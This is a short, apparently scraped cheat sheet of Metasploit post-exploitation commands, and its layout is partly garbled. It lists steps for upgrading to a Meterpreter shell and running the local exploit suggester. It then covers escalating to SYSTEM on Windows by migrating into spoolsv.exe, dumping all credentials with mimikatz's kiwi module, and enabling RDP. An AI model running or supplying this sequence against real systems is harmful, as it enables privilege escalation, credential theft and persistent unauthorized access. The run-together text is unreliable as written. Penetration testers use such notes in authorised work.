974 B
974 B
Metasploit
-j
Run job in backgroundsessions -i 1
interactive session 1
Meterpreter
- CheatSheet
- Upgrade shell
post/multi/manage/shell_to_meterpreter
execute
commandsearch
filesdownload
andupload
files
Metasploit after gaining foothold
- Meterpreter shell is opened on target. Run exploit suggester
run post/multi/recon/local_exploit_suggester
- Decide on your exploit and
background
the meterpreter. - Use the exploit.
use <path/to/exploit>
- Fill options like
session
and run the exploit
Privilige Escalation on Windows Using Metasploit
- Find process with higher privs and migrate to it. Example
spoolsv.exe
.
migrate -N spoolsv.exe
* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds
load kiwi
help
creds_all
- Enable RDP via
run post/windows/manage/enable_rdp